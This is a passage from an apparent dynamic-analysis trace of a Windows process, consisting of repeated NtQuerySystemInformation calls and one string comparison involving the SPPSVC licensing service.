ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x28, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.376] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x28, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e960, Length=0x20, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb60, Length=0x38, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9e0, Length=0x20, ResultLength=0x0) [0240.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e970, Length=0x20, ResultLength=0x0) [0240.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f180, Length=0x50, ResultLength=0x0) [0240.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f070, Length=0x50, ResultLength=0x0) [0240.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edd0, Length=0x28, ResultLength=0x0) [0240.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee40, Length=0x28, ResultLength=0x0) [0240.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efa0, Length=0x38, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x20, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7edb0, Length=0x20, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efc0, Length=0x50, ResultLength=0x0) [0240.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb0, Length=0x50, ResultLength=0x0) [0240.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec80, Length=0x28, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ede0, Length=0x38, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x20, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebf0, Length=0x20, ResultLength=0x0) [0240.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.396] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f130, Length=0x40, ResultLength=0x0) [0240.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x50, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ead0, Length=0x50, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.410] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e830, Length=0x28, ResultLength=0x0) [0240.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e8a0, Length=0x28, ResultLength=0x0) [0240.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea00, Length=0x38, ResultLength=0x0) [0240.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e880, Length=0x20, ResultLength=0x0) [0240.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.411] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e810, Length=0x20, ResultLength=0x0) [0240.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7f090, Length=0x40, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7efb0, Length=0x30, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eeb8, Length=0x30, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x38, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec10, Length=0x28, ResultLength=0x0) [0240.415] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec90, Length=0x50, ResultLength=0x0) [0240.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.418] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7e9f0, Length=0x28, ResultLength=0x0) [0240.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea60, Length=0x28, ResultLength=0x0) [0240.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eae0, Length=0x28, ResultLength=0x0) [0240.422] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x38, ResultLength=0x0) [0240.423] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea40, Length=0x20, ResultLength=0x0) 